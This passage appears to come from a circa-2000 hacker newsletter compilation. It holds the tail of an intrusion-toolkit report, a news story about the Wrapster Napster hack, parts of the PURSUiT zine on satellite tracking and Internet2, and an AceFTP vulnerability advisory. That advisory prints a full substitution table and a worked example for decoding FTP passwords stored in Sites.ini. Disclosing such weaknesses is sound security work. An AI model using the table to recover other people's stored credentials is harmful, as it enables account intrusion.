can be easily avoided by training or hiring competent administrators.
While the steps we outlined above are above these simple, basic system level
administration actions, prevention of this kind of compromise is easily
done. Any organization should facilitate the spread of vendor supplied
security patches.
As noted in the introduction, we have attempted to contact the administrato=
rs
of the domains listed in the target lists for the distribution of the toolk=
it
or in the records of where the intruders connected. We are providing this
analysis to the community in an effort to facilitate the cleanup from this=
=20
ring of intrusions. It spreads worldwide, including Europe and the Pacific
Rim, focusing largely on academic instritutions. We have appreciated the=20
response from the community when contacted, and offer to help in any additi=
onal
ways.
Special thanks to George Weaver from PSU for some of his analysis on the SP=
ARC
trojans we found.
Section 4: Selected References
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Dietrich, Sven: Shaft Analysis: http://sled.gsfc.nasa.gov/~spock/shaft_anal=
ysis.txt
nmap http://www.insecure.org/nmap
netcat ftp://coast.cs.purdue.edu/pub/tool/unix/netcat
--J/dobhs11T7y2rNN
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.2
iQCVAwUBOOLBWixiYuLsTgIxAQEb6QP/X3CXJVx+TdFHmHPjNn8je0ZpUUiT//Ra
9HgPe1LAgAbDEyQmDx26Gyvk2o8zXxYSazL2caz7B4xupnbPDrYWgDdXCyk//zqD
a/WYD5XzORlePaATW2ULV+ALFeoTmZBe0NXPKE6MtbBE4P+JLCDU+PvR3gbMYecL
1p028VzivgA=
=pBQV
-----END PGP SIGNATURE-----
--J/dobhs11T7y2rNN--
@HWA
112.0 Wrapster, the Napster hack fires up the trading fires.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Submitted by: Dragos Ruii
(You didn't have to stare too hard at the crystal ball to see this
one coming. Or the truly anonymous napster clones a la gnutella
that will be next. --dr)
Napster hack allows free distribution of software, movies
By John Borland Staff Writer, CNET News.com March 22, 2000, 4:15 p.m. PT
update A new program has been posted on the Internet that transforms
a popular music-trading network into a full-blown online swap meet capable
of trading videos and software.
The program, dubbed Wrapster, has been available for downloading since
yesterday. According to its developer, Wrapster allows any kind of file to
be listed and traded over the Napster network, which was designed to
recognize only MP3 music files.
CNET News.com was able to use the program to locate and download several
different types of files through Napster. A source at Napster said company
executives are aware of Wrapster but have not done anything to block its
use.
Wrapster joins a growing list of programs allowing the quick, free and
wide distribution of illegally copied files. The trend is bad news for
record companies, movie studios and software companies that have fought
hard to keep their wares from being pirated online.
Programs such as Wrapster and Nullsoft's Gnutella, which mimic and expand
on Napster, are quickly speeding the erosion of copyright protections
online, leaving copyright holders scrambling to keep up.
"(Copyright holders) are aggressively pursuing the issue in the courts,"
said Peter Schalestock, an attorney with Perkins Coie. "They'd like to
keep up with the technology, but that is turning into an arms race."
Napster, a program designed to let Internet users swap music files with
one another, has quickly moved to the heart of the controversy over
pirated music and online copyrights. The software allows people to share a
library of MP3 music files with anyone else on the Napster system and to
freely download songs directly from others' computers.
Napster's ease of use and the huge selection of music available through
the system have made it a favorite among college students and other
communities with high-speed Internet connections. Thousands of people can
frequently be found on the network in the evenings, often sharing nearly a
million songs with their peers.
This has infuriated the recording industry, which views Napster as a tool
for piracy. The Recording Industry Association of America (RIAA) has sued
the company, charging that its software is facilitating the illegal
distribution of material. The industry is asking courts for a potentially
huge sum of $100,000 per illegally distributed song.
Watch video "The overwhelming majority of the MP3 files offered on
Napster are infringing," the RIAA says on a Web page explaining its
position. "We believe Napster knows this and even encourages it."
To this point, the turmoil has been caused simply by the distribution of
music files. Wrapster raises the stakes, however.
The Wrapster program tricks the Napster software into thinking that any
file or set of files, including items such as software, videos or games,
are MP3 files.
Its author, identified as "Octavian" in the program's "about" file,
suggests using the software as a means for trading programs such as
Windows 2000. Octavian could not be reached for comment.
While aware of Wrapster, executives at Napster do not yet see it as a
problem.
"They really see it as something that's benign right now," said Dan Wool,
a spokesman for Napster. "Until it poses some kind of problem, they'll
just keep the status quo."
Napster proponents note that Wrapster's search capabilities aren't unique
online. A less well-known program dubbed iMesh allows people to swap
music, video and other multimedia files. That provides a broader range of
options than Napster itself, which only supports MP3 files, but falls
short of the capabilities of the new Wrapster technique.
The software also has spawned imitators offering expanded features.
Programmers at Nullsoft, the digital music player company recently
acquired by America Online, unveiled an open-source effort that, like
Wrapster, would allow any kind of file to be shared. Although AOL quickly
pulled the project from its site, the code is available elsewhere, and the
project may move ahead independently.
"Other programs have already tried to imitate Napster's system and even
taken it a step further," said Wayne Chang, a Haverhill, Mass., student
who manages Napster's online community bulletin boards. "Wrapster is just
ripping off the same idea, except this time disguising the files as the
only media that Napster currently recognizes."
The movie and software industries are watching the RIAA's experience
closely, aware that they'll ultimately be subjected to the same pressure.
They don't face the same risk of widespread piracy today because
high-speed Internet connections still aren't common enough to make
numerous downloads of their products feasible.
An audio MP3 file generally takes up to half an hour to download over a
dial-up connection and just seconds over a cable or DSL modem. A file such
as Windows 2000 or a Hollywood movie, however, could take all day over an
ordinary modem and potentially hours even over a fast connection.
Nevertheless, the studios and software manufacturers are doing their best
to protect their works against copying and to threaten potential pirates
with high-stakes lawsuits.
"It's an arms race as long as someone is trying to get around (copyright
protections)," said Rich Taylor, vice president of public affairs for the
Motion Picture Association of America (MPAA). "The only things that are
preventing a full-blown explosion of video entertainment on the Net are
the lack of high-speed connections and the need to secure that digital
product."
-- dursec.com / kyx.net - we're from the future
http://www.dursec.com learn kanga-foo from security experts: CanSecWest -
May 10-12 Vancouver
Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD,
Max Vision/whitehats.com
@HWA
113.0 AceFTP vulnerabilty by Armour
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: Armour (email)
http://www.2600.org.au/advisories/aceftp-032000.txt
Vulnerability in AceFTP's Password Storage
-------------------------------------------
by Armour - March 2000
Intro:
------
Following black-hand's advisory from November 1999/January 2000 on password
storage, it was discovered that AceFTP uses a similar character substitution
for local storage of user passwords.
Such storage is no better than a plaintext file containing the passwords.
Applies to:
-----------
AceFTP 2.4a - not tested on earlier versions.
Discussion:
-----------
AceFTP stores user passwords in the Sites.ini file, typically located at:
(C:\Program Files\AceExpertFTP\Sites.ini)
Exploit:
--------
Entering a password of abcdefghijklmnopqrstuvwxyz, we are able to derive
the letter substitution, printed below:
A= CB
B= C8
C= C9
D= CE
E= CF
F= CC
G= CD
H= C2
I= C3
J= C0
K= C1
L= C6
M= C7
N= C4
O= C5
P= DA
Q= DB
R= D8
S= D9
T= DE
U= DF
V= DC
W= DD
X= D2
Y= D3
Z= D0
Here are the contents of a sample Sites.ini file:
[multu]
Host=hhhh
Anonymous=0
User=h
SavePassword=1
Password=�CBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0
HostFolder=
Port=21
Firewall=1
LocalFolder1=
LocalFolder2=
LocalFolder3=
Comments=""
Working backwards with the substitution table above, we find that
�CBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0 represents
abcdefghijklmnopqrstuvwxyz.
If an intruder has network or physical access to the Sites.ini file on your
hard drive, then your passwords are compromised. The intruder will be
able to extract all necasssery information from the file to break into
your account(s).
Contact:
--------
I can be contacted on armour@swish.bur.st
-Armour
@HWA
114.0 Pursuit Zine #1 (Aug 99)
~~~~~~~~~~~~~~~~~~~~~~~~
Something I seem to have missed, looks like a one off, so i'll preserve
it here, you UK phreaks should like this, among others it covers a few
things of general interest, have a gander. - Ed
XXXX X
XXXX XX X X XX XXXX XXXX X X XX XXXXX
XX XX XX XX XXX XX XX XX XX XX XXX
XX XX XX XX XXX XXX XX XX XX
XXXXXX XX XX XX XXX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX
XX XXX X XXXXX XXX XXXX XX
XX
[ P U R S U i T - a u g 9 9 ] X
Index for this issue of PURSUiT
[0x00] Introduction by the staff
[0x01] Editor's notes by bxj
[0x02] Internet2 (i2) and Next Generation Internet (NGI) by Cyphunk
[0x05] AXS Script Makes WebServer Vulnerable by f0bic
[0x06] Boxing in the UK (series) by Oktal
[0x07] Introduction to firewalls by deadline
[0x08] The FileThief exploit by Mister-X and Alkatraz
[0x09] PURSUiT News update
If you got an article you want us to publish, please e-mail it to
bxj, foney_op or Cyphunk and after we'll read it we will decide
if to publish it in PURSUiT or not. In either cases, the writer
will be informed.
I (bxj) can be contacted at <bxj@mail.com>, e-mails to f0bic can be
sent to <f0bic@deadprotocol.org> and Cyphunk can be e-mailed to
<mindmore@mindless.com> if needed. We all can be reached on the UnderNet
IRC network, in the channels #HackTech #HackUK and #KIP.
A note for Phrack editors: We come in peace.
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSU
iT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PUR
SUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][P
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
` Well, there is not much to tell, just read the editor's notes for '
' information on the zine, and on each issue. `
` '
' We all would like to thank the following people for helping and `
` making this zine possible: '
' `
` Bill Clinton, Al Gor (hey, he invented the net), Monica Lewinsky, '
' Linda Trip, Jay Lenno, George Lucas, the New York Police, `
` Jack the ripper (the one who cut people), The guy who invented '
' air-conditioning, the guy who invented sneakers, Bose Inc., `
` And rest of the world, except the ones we really really hate. '
' `
` Yeah, this one was just to fill up space, so just ignore it, and '
' we were just kidding about the guy who invented sneakers. `
` '
' Don't forget to read the news at the end of the zine. `
` '
`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
_______________________
[_______________________]
[ ]
[ Editor's notes ]
[_______________________]
[_______________________]
What is PURSUiT? PURSUiT is about information. About knowledge.
Knowledge is not power, it's an advantage. Information is the
real power. We will supply information, and educate on how to
use that information. We will supply knowledge, and guide how
to control that knowledge.
PURSUiT is here to share information, to teach the world what
really is going in the underground. No, we will not teach how
to make a homade atom bomb. And no, we will not instruct on how
to kill your neighboors. We will tell you the stuff that really
matters.
A little background. PURSUiT started somewhere in 1999, as an idea
to get the old-school days back. To be a real, informative zine.
We gathered some of the most skilled individuals of this industry,
and became one. A smart man once said, that a small group of skilled
individuals, excellent with their performance and one with their
cause, are better than a whole army. Commandos, they called it.
Well, I belive PURSUiT are the commandos of todays digital world.
Remember the old days, the days of the BBSs, the telecommunications
and computers revolution, the days when "Windows" was not a fluent
term in more than 80% of Earth's population, the days when there were
almost no script kiddies, when the Internet was not a "super-highway"
and when Geocities was not formed yet. The days when true Hackers lived.
The days of learning, days of information and days of sharing.
PURSUiT is here to return these days.
PURSUiT is bringing back the old-school.
Peace out, and keep it real, always,
--bxj.
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x x
x Tracking Satellites Basics x
x x
x By Overfien x
x x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Their are 3 basic types of orbits you should be aware of when
tracking satellites.
1) Low altitude circular orbits used by phase 2 satellites
2) Elliptical orbits as used by phase 3 sats.
3) Spacecraft and geostationary orbits planned for phase 4 satellites
Satellites are moving targets, so when a ground station uses
directional intennas aiming information must be available. Your average
daily access time for a satellite is an important quantity in determining
how useful the satellite will be to you.
A low-altitude satellite (such as SBID, Fugi-OSCAR 20, RS-10/11
or a microsat) will generally be in range for 25 minutes or less each
time it passes by.
A satellite in high-altitude elliptical orbits for phase 3 space-
craft (such as VBeekon, OSCAR 10 and 13) behaves very differently. It
will provide one or two passes per day, but the total access time will be
(very roughly) 12 hours for Northern hemisphere stations.
A geostationary satellite appears to hang motionless in the sky.
If it's in range you'll have access to it 24 hours per day (unless the
weather really sucks). If it's out of range you'll never see it.
Satellite enthusiasts wishing to track a satellite are intrested
in specific information. They want to know:
1) When the satellite will be in range; more specifically times
for AOS (acquisition of signal) and LOS (loss of signal) for
each pass.
2) Where to aim the antenna (azimuth and elevation) at any time.
3) The regions of the earth that have access to the satellite.
There are "2" main methods of tracking; which are the graphic
method and the computer method. I would like to focus on the computer meth.
Tracking software naturally answers the basic tracking questions:
It will tell you when the satellite is in range and provide you with
antenna pointing data. For example, at each specified time the program may
list range (the distance between your station and the satellite), the doppler
shift for the mode you specify (which helps you locate your downlink), the
height of the satellite (for elliptical orbits this varies), the phase or
mean Anomaly (a number that tells how close to you the satellites antennas
are currently aimed), predict signal levels (on the downlink), path delay
time (often labeled echo) and an orbit number (for refference purpose I
believe - no effect on tracking)
Lets look at the input the computer requires. Naturally it will need
the location of your groundstation in terms of latitude and longitude. Some
newer programs may even ask for your height above sea level (this shouldn't
have any observable effect for 99.99% of amateur/satellite tracking
programs), so even if you live in Seattle and have a monster EME antenna,
you can just enter "0" or some approx. "#" if you don't know the correct
value.
The program also has to know the precise orbit of the satellite
you're intrested in via orbit size, shape, orientation with respect of the
earth/stars. This is called orbital elemants. Now your basically ready to
track. For example, when I boot up my "sat box" basically one of my boxes
just used for tracking. A main menu pops up that asks:
1) Do you want Batch tracking data
2) Do you want real-time tracking data
3) Do you want to modify parameters
4) Move to graphical interface
5) Exit program
Once I responded by typing a single number (perhaps followed by
the enter key) If I respond "1" to obtain Batch tracking data, the program
needs to know which sat. your intrested in, the date an time to start the
calculations.
We now take a look at the Batch output provided by a typical program.
I am using the new version of IWI98:
ADLMIL 3
Ground Station: lat=39*N, long=77*W, Ht=0km
DAY # 602 - - - Friday, August 20 - - - 1999
UTC AZ EL Doppler Range
HHMM DEG DEG HZ KM
1145 167 5 - 18353
1200 166 11 -1867 20664
1215 165 16 -1733 22773
1230 166 21 -1596 24694
The heading identifies the satellite "ADLMIL 3" (HEH, I promise its
not a military satellite ;-)) My ground station location (I had to change for
unexplainable reasons) first 3 columns of the table show time, Azimuth and
Elevation. ADLMIL 3 will come in range sometime between 1145 and 1200 utc
and remain in range for 'bout 9.5 hours. Column 4 provides data on Doppler
shift. AT 1200 UTC a signal coming through the mode B transponder will appear
1867 HZ lower than predicted using the transponder frequency. Because of
the algorithm being used to compute Doppler shift, no value is provided for
1145 utc, the first time the satellite comes into range.
Alright just as theirs a jargon for practically everthing theirs also
one for "Satellite Tracking" heres it broken down:
Access range (acquisition distance)
Acquisition distance: Maximum distance between the subsatellite point
and ground station at which access to spacecraft
if possible
AOS (Acquisition Of Signal)
Apogee: Point on orbit where satellite height is maximum
Azimuth: Angle in the horizontal plane measured clockwise
with respect to North (North = 0*)
Epoch (Epoch time): A reference time at which orbital elements are
specified
EQX (ascending node)
Ground track (subsatellite path): Path on surface of earth traced out by
SSP as satellite moves through space
Increment (longitudinal increment)
LOS (Loss Of Signal)
Node: Point where satellite ground track crosses the equatar
Pass (satellite pass)
TCA (Time of Closest Approach): Time at which satellite passes closest
to a specific ground station during
orbit of intrest
Well, this completes my text on satellite tracking basics. Expect
too see more articles in the future until then "watch the sky"!!
Overfien@hushmail.com
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
||PURSUiT is proud to present.. ||
|| ||
|| Internet2 (i2) and Next Generation Internet (NGI) ||
|| ||
|| Compiled by Cyphunk ||
|| ||
=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
-----------------------------------------------------
- Internet2 (i2) and Next Generation Internet (NGI) -
-----------------------------------------------------
Internet2 and NGI are two advanced network initiatives by the US
government (for NGI) and UCAID (University Corporation for Advanced
Internet Development, for i2.) The key here is initiative. What I mean is
that you won't find physical networks that are called Internet2 and NGI.
Both NGI and i2 run over existing high speed US Backbone networks such as
the vBNS, Abilene, ESNet and many others (discussed later). The only real
thing that makes i2 and NGI different from each other is who is in
charge. You will see many NGI and i2 peers that are registered under both
initiatives. The requirements for becoming a peer on one of these
networks is:
1) You have a project that requires very reliable and high-speed
connections to another i2 peers.
2) You have a lot of money.
The reason for these initiatives was/is:
1) To foster high speed applications of which cannot run on the
existing Internet and need a guaranteed connection.
2) To develop smarter network services and ways of guaranteeing
bandwidth and latency rates.
3) To increase collaboration of National-to-National and
National-to-International research departments (commercial,
academic and governmental).
A question that may arise is: "Why not just upgrade the existing Internet
and use that as the platform for advanced research?" The reason this was
not done is because it has become obvious over time that no matter how
much bandwidth you throw to the Internet it will be over used. So,
instead of thinking BIGGER the NGI and i2 initiatives are mainly about
thinking SMARTER. These networks are private to their peers and those
peers must have a Research and Development related purpose for being
there. This cuts out the general, bandwidth sucking, public right from
the start. In order to keep the i2 and NGI peers from causing the same
problems amoungst themselves advanced services and "Quality of Service"
(QoS) systems and policies have been developed and put in place over
these networks to keep one peer from stepping on the toes (line quality)
of another.
The end goal of many of the advanced applications and technologies being
developed by i2 and NGI peers is to have them introduced to the public
and commercialized through places such as the internet. Types of
applications already being developed involve TeleEmersion and
TeleMedicine (to think of a few).
After thinking and working *smarter* these networks will go *bigger* and
faster. Amongst the goals of i2 and NGI is to develop the fastest and
most efficient networks on the planet to "further the US lead in the
global IT market" (whatever). To do so, both sides will work together on
finding ways to work more efficiently and develop faster hardware
devices. When at i2 and NGI conferences you may hear allot of talk about
TeraPOP's (Terabit Points of Access). Though there are no TeraPOP's out
there yet they are definitely on the horizon (a few years off).
Practically all of the literature on the net concerning i2 and NGI are
incomplete. The problem is that most of the papers are in M$ PowerPoint
format, which really does no good except for the person which created it.
It's like looking at teachers' notes when you're not the teacher; it's
not helpful. I hope to make this somewhat complete and understandable.
However, considering that many of the pieces of these two networks are
still under development, don't be surprised if there are some gaps and
you finish with more questions than you started with. My one request,
however, is that you e-mail me at: mindmore@mindless.com with the
questions that this article may raise and any comments/corrections you
may have. This article attempts to detail the services and the goals of
both NGI and i2. I'll try not to bore you though :)
Note: It helps if you already have an understanding of Networking (OSI
Layers, Protocols, devices and the likes) to understand the details of i2
and NGI. Also, I realize that there are probably allot of grammer errors,
thanks for bearing with me.
This paper is split up into 4 sections. The first discusses the Services
provided by NGI and i2 (QoS, Multicasting, and IPv6). The second
discusses i2 and NGI separately, covering the characteristics of the two
individually. The third discusses the physical characteristics of the
networks that the i2 and NGI peers connect through. The 4th, brief
sections, discusses security issues that I see.
I. Services
------------------------------------------------------------------------
As I said before, both i2 and NGI support and are active in developing
the standards for IPv6, QoS and Multicasting. I will try get into each
networks implementation of these services later. The purpose of this
section is to introduce you to the services I just mentioned so that you
have a basic understanding about them.
> IPv6 in brief
IPv6, also known as IPng (IP Next Generation), is the *upgrade* to the
currently over killed IPv4 addressing protocol. These addresses are
called IP addresses and every computer on the net must have a unique IP
address to communicate on the Internet. There are allot of computers on
the net and very soon there won't be enough IPv4 addresses left for them.
IPv4 addresses are 32-bit addresses. This allows for 4,294,967,296
possible numbers. However, I'm guessing that after segmentation we get
around 1.5 billion or so addresses. When this protocol was defined it was
thought that a 32-bit address would be plenty. After all, how many
computers could the small group of DARPA Geeks own :). However, the
Internet became something more then a high speed government and academic
network and into the public/global domain. Today we are coming to a point
where we just don't have enough IP addresses. I mean, you call you ISP
and ask them how much it would cost to get your own Static IP address
from them. For me, with my ISP, it is $20 more a month. That is a big
jump from FREE.
So, the guys and gals at the IETF (Internet Engineering Task Force) have
been working on IPv6, which will fix these problems. IPv6 gives us
128-bit addresses represented in binary, of course, and Hexadecimal. 128
bits give -18,446,744,073,709,551,616 squared- possible numbers, which
should last us until the transition of the Internet being public/global
to becoming extraterrestrial/public/universal. There is more to the
protocol than just an increased address space, however. The headers
structure of the IP packet has changed. IPv6 headers are somewhat larger
then IPv4 headers but IPv6 headers are much more simplified. For
instance, the IPv4 header sizes can vary whereas the IPv6 headers are
always 40 bytes. Making the headers a fixed size allow for easier
processing. IPv6 has also taken away some of the unused fields that were
in IPv4 making it simpler. It has also added optional fields that can be
used for increased security. For example IPv6 encryption headers indicate
which encryption keys to use, and carry other handshaking information.
For more info check the IPv6 related RFC's, there are a ton of them.
> QoS
One thing that people are starting to realize is that no matter how much
bandwidth you throw to the public or private sector, they always use it
and over use it. Though one objective of i2 and NGI is to increase
bandwidth capacity, the other is to manage or regulate who has access to
that bandwidth, how much of it and the quality of it.
The Internet currently runs as a "Best Effort" service network. This
means that if the TIT (Tokyo Institute of Technology) NanoTech department
needs 5mbps with no more then a 200ms delay for a joint project with MIT
(Massachusetts Institute of Technology), over the internet they will rely
on pure luck to get what they need. Luck that the lines from them to MIT
will not be saturated with traffic at that time. This is a big problem,
because this sort of luck rarely ever happens over the Internet. We need
to develop a way to guarantee them the bandwidth and quality they need
for that period of time.
This is done through QoS (Quality of Service) whose development is
primarily the job of the IETF (Internet Engineering Task Force) QoS
workgroup. One objective of NGI and i2 is to guarantee end to end QoS.
Which means that even if it takes 10 hops to get from TIT in Tokyo to MIT
of if it takes 2 hops, they will be guaranteed 5mbps, 200ms, all the
way. Currently there are two basic standards being used for QoS: the
RSVP protocol and DiffServ.
>> RSVP (Resource ReSerVation Protocol)
RSVP guarantees end to end bandwidth reservations and delay times from
node too node. Unlike DiffServ, which works more in a BB (Bandwidth
Broker, ISP)-to-BB basis or Network-to-Network basis whereas RSVP works
on a node to node basis. This allows for tighter QoS and is necessary for
Multicasting but is not as flexible as DiffServ. RSVP supports multicast
groups (discussed later) and RSVP operates on top of IPv4 or IPv6 acting
like a layer 4 protocol. RSVP, also, acts like a routing protocol though
it does not take the place of existing routing protocols, it operates on
top of them (adding features where needed). RSVP causes a higher strain
on the network due to the fact that there is checking going on from node
to node.
For more information on RSVP check out rfc1633 and rfc2205
>> DiffServ (Differentiated Services)
DiffServ causes less strain on a network then does RSVP. For this reason,
it is the preferred method. However, DiffServ doesn't guarantee the
connection as well and as tight as RSVP does. So there are trade offs.
DiffServ works buy labeling packets with "per-hop behaviors" (PHB's).
PHB's basically define the level of service that this packet will need.
The PHB is initially defined on the edge routers (closest to the sending
device). End devices on the network have the job of reshaping traffic as
it leaves the domain, taking into account any burst traffic that may
occur. DiffServ assures a basic throughput but allows for bursts when
resource availability permits (depending on the PHB type assigned to the
packet). All the information needed for DiffServ is held in the DS-field
in the IP headers.
In all likely hood we will not be implementing DiffServ on our home, or
small networks or even large ones for that matter. It will be the
responsibility of your BB (Bandwidth Broker, also know as your ISP) to
provide DiffServ where needed. It will be the BB's job of aggregating all
of their DiffServ traffic into one stream before it is sent out of the
network and onto another.
Last thing: DiffServ, unlike RSVP, has no built in support for
Multicasting.
For purposing of testing QoS methods the QBONE initiative was created in
1998. The QBONE is a joint effort of academic, governmental and corporate
researchers and engineers. Created as a wide area testbed for QoS
protocols. It crosses both NGI and i2 borders operating through almost
all of the advanced networks in the US and abroad (such as vBNS,
Abilene, ESNet, CA*NET, which are discussed later).
For more details on the QBONE and QoS try
http://www.internet2.edu/qbone/.
> IP Multicasting
Let's say that both you and I live in the same city and use the same
Internet provider. Lets also say that we are both listening to a live
stream (if they one day do live) of Geeks in Space
(www.the-sync.com/geeks) at the exact same time. This means that the same
datagrams are coming to the same network, the same POP, at the same time,
like so:
_____ ____
|Geeks|----Stream1-----|our |-------- Me
| in | |Lame|
|Space|----Stream2-----|ISP |-------- You
----- ----
It would certainly be to the entire Internets advantage and ours if we
could combine those two streams into one, creating less congestion on the
network. IP Multicasting reefers to doing exactly that. Example:
_____ ____
|Geeks| |our |-------- Me
| in |----Stream------|Lame|
|Space| |ISP |-------- You
----- ----
In the above example there is only one stream of datagrams going out over
the internet but once it gets to our ISP it splits the stream into two
and sends Geeks In Space to you and I at the same time. In order to do
this it creates "Multicasting Groups" for each stream (both you and I
being in the same group). It also requires smart routers which can
replicate streams and keep track of and create these groups, dynamically
adding users when needed. Also, the routers all along the way from the
Real Audio server to our ISP must support IP multicast protocols such as
DVMRP (Distance Vector Multicast Routing Protocol), PIM (Protocol
Independent Multicast) or MOSPF (Multicast Open Shortest Path First).
To use IP multicasting today you must connect to an existing network
within the public Internet known as the MBONE (at least, that is where
all the action is at). Before you can do that, however, your ISP must
support Multicasting. Check with them to see if they do, else, switch
ISP's. For more information about the MBONE and IP multicasting check out
www.mbone.com. For even more info on multicasting try
www.ncne.nlanr.net/faq/multicast.html
II. NGI and i2
------------------------------------------------------------------------
Like I said before, the NGI and i2 initiatives are almost identical. They
operate on, mostly, the same networks and backbones. They have pretty
much the same goals. However, there are a few things that make them
different, other than who is in control of each initiative and the budget
that they have. The following takes a look at each initiative.
> NGI
In the NGI there are a few different Government organizations that are
involved in making the goals of NGI a reality. Those organization are
DARPA (Defense Advanced Research Projects Agency), NSF (National Science
Foundation), NASA (National Aeronautics and Space Administration), NIST
(National Institute of Standards and Technology), NLM (National Library
of Medicine) and the DoE (Department of Energy). Each of these
organizations have different responsibilities, some overlapping in areas.
Each of these organizations have their own physical networks that they
can test things out on (some of which are discussed later). I'm not going
to discuss the specifics of what their jobs are, if you want more
information go to: www.ngi.gov
NGI project budget for 1998 was $80 million US Dollars. 1999 is $110
million. 2000 will be $110 million. The project was only granted 3 years
of funding by Congress but planned up till 2002 (I guess the budget comes
later). There is a possibility that it could be extended even father,
however. There are number of very specific goals for NGI:
To develop a NGI testbed that supports end-to-end QoS for new networking
technologies and advanced research. This testbed will connect at least
100 NGI sites - universities, Federal research institutions, and other
research partners - at speeds 100 times faster than today's Internet
(OC-3 - 155mbps), and will connect 10 sites at speeds 1,000 times faster
than the current Internet (OC-48 - 2.5gbps).
Another goal of the NGI is to demonstrate Terabit switching technology by
2002. At the NGI/i2 conference I went to there was a professor from
Hebrew University Israel who gave a lecture on an Optical Terabit switch
that he had developed and tested. The switch could do well over 1tbps
with hop rates of 10ms. That certainly grabbed the attention of the NSF
guys at the conference. The device is supposed to go into production
sometime in two years, as I remember.
The NGI network is spread out over several different networks. The ones
that I know of are: vBNS (run by NSF), Abilene (run by UCAID), ESNet (run
by DoE) and NREN (run by NASA).
In order for a corporation or University to hook up to NGI they must
connect to one of these backbones. In many cases we see where the
requesting peer will just connect to a GigaPOP which is already connected
to one of the backbone NAP's. Then they must arrange (with the NSF I
believe) to be added to the NGI registrar and routing tables. In many
cases, the organization or university can get government funding from the
NSF.
> i2
Internet2 is an advanced network initiative by UCAID (University
Corporation for Advanced Internet Development) and several other
corporations. The budget is about $80 million a year. i2, like NGI, is
spread out over various high speed backbones in the US. The two major
ones are vBNS and Abilene, which will be discussed later. In most cases
Universities will connect to GigaPOPs which intern connect to one of the
i2 backbones.
I2, like NGI, is involved with implementing and developing QoS, IPv6 and
advanced network applications. There isno real literature on the net that
discusses the goals of i2. The talk is more around the backbones that it
operates on.
III. Advanced high speed backbones
------------------------------------------------------------------------
As I said before, both i2 and NGI run over serveral high speed backbone
networks. The follow discusses a few of them in detail.
> vBNS
The NSF initiated the very high speed Backbone Network Service (vBNS) in
1995. With help from MCI the NSF setup a high speed backbone across the
US. The purpose was to connect Government, Industry and Universities to 5
SCC's (Super Computing Centers) in the US and then, inevitable, to each
other. For those interested, those 5 SCC's are:
- Cornell Theory Center
- National Center for Atmospheric Research
- Pittsburgh Supercomputer Center
- National Center for Supercomputer Applications
- San Diego Supercomputer Center
The vBNS serves as a backbone for both the NGI and i2 initiatives. The
vBNS uses IP over ATM over SONET. It operates at speeds up to OC-48
(2.5gbps). MCI also created a second "testnet" network for testing
experimental technologies until they prove stable for implementation on
the vBNS. Most Peers connect at DS3 and OC-3 speeds to one of the vBNS
NAP's (Network Access Points) or to a GigaPOP that is already plugged up
to a NAP. The vBNS supports both Native and Tunneled IPv6.
> Abilene
The Abilene network was created by UCAID in collaboration with Qwuest
Communications, Cisco, Nortel Networks and a few other that I don't
remember. Created for the sole purpose of connecting i2 peers. Operates
at speeds up to OC-48 using IP over SONET. As I remember, the lines were
laid and POP's put in place by Qwuest Communications. If you want to
connect to the Abilene backbone all you need is $110k a year for a OC-3
connection, $320k a year for a OC-12. Small price to pay :]
> ESNet
ESNet (Energy Science Network) headed by the DoE (department of Energy)
provides for speeds up to OC-12. Connects directly to the vBNS, STARTAP
and many other high speed US backbones. Peers connect anywhere from 64k
up to OC-12 speeds. Been around for a while and has allot of networks
connected to it. For more information check out: www.es.net
> International networks
It was 1997 that the NSF starting taking proposals from other R&D
networks in other countries to add International peers to its registrar
